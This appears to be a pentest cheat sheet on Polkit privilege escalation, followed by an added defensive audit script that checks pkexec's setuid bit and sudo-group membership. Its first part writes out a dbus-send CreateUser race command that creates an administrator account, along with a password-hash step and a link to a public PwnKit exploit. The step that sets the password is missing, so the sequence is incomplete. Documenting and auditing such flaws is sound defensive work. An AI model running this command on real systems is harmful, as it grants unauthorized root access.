PolKit Privilege Escalation
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
Create a new user by sending a D-Bus message to the accounts service (org.freedesktop.Accounts).
# string:tester: the name of the new user, "tester".
# string:"Tester Account": the description of the new user.
# int32:1: account type 1 (administrator), which puts the user in the sudo group.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Then check the new user's ID (uid).
id tester
uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
# -6: generate a SHA-512 crypt hash of the password
openssl passwd -6 password123
Copy the output hash.
Log in as the new user with the password you created (e.g. "password123"), then change to root.
PwnKit is a local privilege escalation vulnerability in Polkit's pkexec. Many exploits are publicly available; for example:
https://github.com/Almorabea/pkexec-exploit (written in Python)
To mitigate the vulnerability, remove the setuid bit from the pkexec executable.
Alternatively, simply upgrade the packages (e.g. with apt); most distributions ship versions patched for the vulnerability.
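The following POSIX shell script is an added example, not code from the original page or from any polkit project. It implements the two defensive checks that the notes above call for: whether pkexec still carries the setuid bit (with a helper that strips it, as the mitigation text suggests), and which accounts sit in the sudo group (where the CreateUser message above places its new account), compared against an allowlist. The location of pkexec (looked up with command -v), the PKEXEC_PATH and ALLOWED_SUDO environment variables, and the group file path are assumptions.

```shell
#!/bin/sh
# Added polkit hardening audit (example code, not from the original page).
# Run it as: sh polkit_audit.sh   or source it to reuse the functions.

# 0 if the file carries the setuid bit, 1 otherwise (POSIX "test -u").
has_setuid() {
    [ -u "$1" ]
}

# Mitigation from the notes: drop the setuid bit from a pkexec binary.
# Caveat: legitimate pkexec invocations also stop working until the
# patched package is installed.
strip_setuid() {
    chmod u-s "$1"
}

# Report the state of the pkexec binary ($1, default: whatever is on PATH).
# Returns 0 when it is not setuid, 1 when it is, 2 when no binary was found.
check_pkexec() {
    path="${1:-$(command -v pkexec 2>/dev/null)}"
    if [ -z "$path" ] || [ ! -e "$path" ]; then
        echo "pkexec: not found"
        return 2
    fi
    if has_setuid "$path"; then
        echo "pkexec: $path is setuid (strip the bit or upgrade the package)"
        return 1
    fi
    echo "pkexec: $path is not setuid"
    return 0
}

# Print members of group $1 from a group(5)-style file ($2, default
# /etc/group) that are not in the space-separated allowlist ($3).
# Returns 1 if any unexpected member was found, 0 otherwise.
unexpected_group_members() {
    group="$1"; file="${2:-/etc/group}"; allow=" ${3:-} "
    found=0
    # 4th field of the matching line is the comma-separated member list
    members=$(awk -F: -v g="$group" '$1 == g { print $4 }' "$file" | tr ',' ' ')
    for m in $members; do
        case "$allow" in
            *" $m "*) ;;                                  # allowed account
            *) echo "$group: unexpected member $m"; found=1 ;;
        esac
    done
    return $found
}

# Stand-alone run: PKEXEC_PATH and ALLOWED_SUDO are assumed env vars.
status=0
check_pkexec "${PKEXEC_PATH:-}" || status=$?
[ -r /etc/group ] && { unexpected_group_members sudo /etc/group "${ALLOWED_SUDO:-}" || status=1; }
echo "audit status: $status (0 = nothing to report)"
```

A non-zero status means either pkexec is still setuid or an account outside the allowlist has sudo rights; both are worth a ticket, since the first is the precondition for PwnKit and the second is exactly the artefact the CreateUser trick leaves behind.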